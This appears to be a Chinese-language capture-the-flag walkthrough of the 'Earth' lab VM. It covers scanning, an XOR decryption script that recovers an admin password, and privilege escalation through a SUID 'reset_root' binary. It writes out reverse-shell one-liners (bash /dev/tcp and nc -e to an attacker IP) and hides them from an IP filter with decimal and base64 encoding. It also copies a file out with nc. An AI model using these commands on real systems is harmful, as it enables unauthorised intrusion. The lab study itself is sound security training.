一、前期准备

下载地址
攻击机(kali):192.168.40.20
靶机:192.168.40.32

二、信息收集

2.1 主机发现

nmap -sP 192.168.40.0/24

2.2 端口扫描

nmap -p- -Pn 192.168.40.32

2.3 版本信息探测

nmap -p- -sV -A -Pn 192.168.40.32

2.4 访问web报错



所以猜测是DNS的原因,添加如下hosts指向
vi /etc/hosts
192.168.40.32 earth.local
192.168.40.32 terratest.earth.local
域名访问成功

源码也并未发现什么东西

2.5 目录扫描

dirsearch -u http://earth.local/

dirsearch -u https://terratest.earth.local

访问https://terratest.earth.local/robots.txt

https://terratest.earth.local/testingnotes.txt

提示说:

  1. 使用的是XOR加密
  2. testdata.txt是测试的内容
  3. terra是用户名
    很明显我们的目的是解密

2.6 解密

解密脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
import binascii  

# 首页的三个字符串之一
data = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

# testdata.txt内容
f="According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

pass16=binascii.b2a_hex(f.encode('utf-8')).decode('utf-8').replace('0x','')

data_fin=hex(int(data,16) ^ int(pass16,16)).replace("0x",'')
print(binascii.unhexlify(data_fin).decode('utf-8'))

解密得到密码为earthclimatechangebad4humans
回到登录界面http://earth.local/admin/login
账号密码为:terra:earthclimatechangebad4humans

三、shell

3.1 反弹shell


反弹shell,被禁止了
bash -i >& /dev/tcp/192.168.40.20/8888 0>&1

ping检测一下ping -c 1 192.168.40.32

ping百度可以

所以,这里是过滤了IP地址
提供两种方式

  • IP地址十进制化
    原始:bash -i >& /dev/tcp/192.168.40.20/8888 0>&1
    变形:bash -i >& /dev/tcp/3232245780/8888 0>&1
  • base64编码
    原始:nc -e /bin/bash 192.168.40.20 8888
    编码:bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDAuMjAgODg4OA
    管道解析:echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDAuMjAgODg4OA|base64 -d|bash

3.2 寻找flag

find / -name "*flag*" 2>/dev/null

去root目录,无权限

四、提权

4.1 寻找可利用SUID

find / -perm -u=s -type f 2>dev/null

reset_root格外的亮眼,执行一下试试

报错

4.2 传回文件分析

kali:nc -lvvp 4444 > rest_root
靶机:nc 192.168.40.20 4444 < /usr/bin/reset_root
strings rest_root

可以发现修改后的密码为Earth,但是不知道为什么会执行失败,那也许是条件不满足
ltrace ./rest_root

ltrace的功能是能够跟踪进程的库函数调用,它会显现出哪个库函数被调用,而strace则是跟踪程序的每个系统调用。


可以看到三个条件不满足,即在运行时,检查了是否存在这三个文件
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
再次运行,成功,切换为root,寻找flag

4.3 分析过滤

python -c 'import pty; pty.spawn("/bin/bash")' 切换为交互式

与黑盒猜测结果一致